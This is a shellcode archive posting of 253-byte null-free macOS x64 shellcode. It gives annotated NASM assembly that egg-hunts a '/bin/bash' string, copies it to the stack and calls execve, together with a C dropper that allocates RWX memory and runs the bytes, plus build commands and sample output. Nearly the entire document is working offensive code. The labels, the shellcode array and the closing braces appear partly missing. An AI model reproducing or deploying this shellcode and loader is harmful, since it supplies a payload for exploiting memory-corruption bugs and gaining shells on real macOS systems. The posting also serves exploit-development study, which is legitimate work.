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macOS/x64 Execve Null-Free Shellcode

macOS/x64 Execve Null-Free Shellcode
Posted Dec 22, 2022
Authored by Bobby Cooke

253 bytes small macOS/x64 execve null-free shellcode.

tags | shellcode
SHA-256 | 8b589116ca43d93bd39b3f0f87c1530ec372e055ebb8ddff6b021bf288966dd7

macOS/x64 Execve Null-Free Shellcode

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# Shellcode Title: macOS/x64 - Execve Null-Free Shellcode (253 Bytes)
# Shellcode Author: Bobby Cooke (boku) @0xBoku github.com/boku7
# Date: 12/20/2022
# Tested on: macOS Monterey; 21.6.0 Darwin Kernel Version; x86_64
# Shellcode Description:
# macOS 64 bit shellcode. Uses execve syscall to spawn bash. The string is within the shellcode. The shellcode finds the string in memory, copies the string to the stack, and then changes the string terminator to 0x00.
# Shoutout to IBM X-Force Red Adversary Simulation team! Currently working through EXP-312 and tinkering with macOS shellcoding. Shoutout to the offsec team for the cool course!
# Compile & run:
# nasm -f macho64 execve.asm -o execve
# for x in $(objdump -d execve --x86-asm-syntax=intel | grep "^ " | cut -f1 | awk -F: '{print $2}'); do echo -n "\x"$x; done; echo
# # Add shellcode to dropper.c
# gcc dropper.c -o dropper
# sh-3.2$ pstree -p $(echo $$) | grep $$
# \-+= 56862 bobby sh
# sh-3.2$ ./dropper
# [+] Shellcode Length: 253 Bytes
# [+] Copying shellcode from variable at 0x10e4fde00 to allocated RWX memory at 0x10e643000
# [+] Executing shellcode at 0x10e643000
# bobby$ pstree -p $(echo $$) | grep -B1 $$
# \-+= 56862 bobby sh
# \-+= 57021 bobby (bash)

bits 64
global _main

push rbp ; push current base pointer to the stack
mov rbp, rsp ; Set Base Stack Pointer for new Stack-Frame
sub rsp, 0x60 ; create space for string
mov [rbp-0x8], rsp ; Save destination string buffer address
jmp short lilypad_1

; char * string eggHunter(egg);
; description: starts searching for the supplied egg starting from the callers return address
mov rcx, [rsp] ; start the egghunter from the caller function return address
inc rcx ; move to the hunter to the next byte
cmp [rcx], di ; did we find the first egg?
jne hunt ; if not, continue hunt

add cx, 0x2 ; move hunter to 2nd egg location
cmp [rcx], di ; did we find the second egg?
jne hunt ; if not, continue hunt

add cx, 0x2 ; both eggs found! Move hunter +2 to return the start of buffer addr
xchg rax, rcx ; return start of string address

; int length strsize(&string, terminator);
; description: gets string size of a string that is terminated with a predetermined non-null byte. Terminator byte not included.
xor rax, rax ; clear register
xor rcx, rcx ; set the counter to zero
mov rcx, rdi ; start of string address
add rcx, rax ; current memory location of char in string
cmp [rcx], sil ; is this the null terminator?
je strsize_return
cmp ax, 0x1001 ; compare value in RAX to 0x1001 (prevent infinite mem scanning)
jg strsize_fail2find ; if value in RAX is greater, jump to label
inc rax ; move to the next char in the string
jmp strsize_loop
xor rax, rax ; return null/ 0x0

jmp short lilypad_2

; char * string terminateString(&string, terminator);
; description: Finds the string terminator and changes it to a null byte
xor rcx, rcx ; set the counter to zero
mov rcx, rdi ; start address to look for terminator
cmp [rcx], sil ; is this the null terminator?
je found_terminator
inc rcx ; move to the next char in the string
jmp loop_find_terminator
mov [rcx], al

; void * dst_addr move_memory(void *dst_addr, void *src_addr, size_t mem_size);
; description: Move memory from source address to destination address
; ARG1 - RDI: destination address
; ARG2 - RSI: source address
; ARG3 - RDX: size of the memory
; Loop through memory and move each byte from source to destination
push rdi ; save the destination address so we can return it at the end
xor rax, rax ; register to temporarily hold the byte we are copying
mov al, [rsi] ; read the byte from source address into the temporary register
mov [rdi], al ; write the byte at the destination address
inc rsi ; increment source address
inc rdi ; increment destination address
dec rdx ; decrement memory size
jnz move_memory_loop ; repeat loop until memory size is 0
; Return to caller
pop rax ; return the destination address of the memory to the caller

jmp short lilypad_3

; void clear_memory(void *dst_addr, size_t mem_size);
; description: Writes 0x00 bytes to a destination address
; ARG1 - RDI: a pointer to the destination address
; ARG2 - RSI: the size of the memory to be written to
mov rcx, rsi ; load memory size from second argument into rcx
xor rax, rax
; Loop through memory and write 0x00 to each byte in destination address
mov byte [rdi], al ; write 0x00 to byte in destination address
inc rdi ; increment destination address
dec rcx ; decrement memory size
jnz clrmem_loop ; repeat loop until memory size is 0
; Return to caller

; *string = eggHunter(egg); Starts hunt from return address of caller
xor rdi, rdi ; clear register
mov di, 0xBCB0 ; Arg 1: Our egg
call eggHunter ; returns string start address
mov [rbp-0x10], rax ; Save string address

mov rdi, [rbp-0x10] ; Arg 1: string start address
xor rsi, rsi ; clear register
mov sil, 0xFF ; Arg 2: string terminator
call strsize ; returns string size
mov [rbp-0x18], rax ; Save string size

; move_memory(dst_addr, src_addr, mem_size);
mov rdi, [rbp-0x8] ; Arg 1: String buffer on stack
mov rsi, [rbp-0x10] ; Arg 2: Original string location
mov rdx, [rbp-0x18] ; Arg 3: size
call move_memory

mov rdx, [rbp-0x18] ; string size
mov rdi, [rbp-0x8] ; String buffer on stack
add rdi, rdx ; Arg 1: string terminator location
xor rsi, rsi ; clear register
mov sil, 0x1 ; Arg 2: mem size to null
call clear_memory ; returns string size

; execve("/bin/bash",NULL,NULL)
mov rdi, [rbp-0x8] ; Arg 1: String buffer on stack
xor rsi, rsi ; Arg 2: NULL
xor rdx, rdx ; Arg 3: NULL
xor rax, rax ; clear register for syscall number setup
mov al, 0x2 ; set a bit in register
ror rax, 0x28 ; move the bit over 28 bits to the right in the register
mov al, 0x3b ; set the lower byte (AL) of the RAX register to the execve syscall number
syscall ; do syscall interrupt

add rsp, 0x60 ; clear allocated stack space
pop rbp ; restore stack base pointer
ret ; return to caller

shell_path_string: db 0xB0,0xBC,0xB0,0xBC,"/bin/bash",0xFF


// dropper.c

#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
int (*execute_shellcode)();

const unsigned char shellcode[] =

int main() {
size_t shellcode_size = sizeof(shellcode);

printf("[+] Shellcode Length: %lu Bytes\n", shellcode_size);

void *rwx_memory = mmap(0, 0x1024, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);

if (rwx_memory == MAP_FAILED) {
printf("[!] Failed to allocate RWX memory\n");

printf("[+] Copying shellcode from variable at %p to allocated RWX memory at %p\n",shellcode,rwx_memory);
memcpy(rwx_memory, shellcode, sizeof(shellcode));
execute_shellcode = rwx_memory;

printf("[+] Executing shellcode at %p\n",rwx_memory);
return 0;

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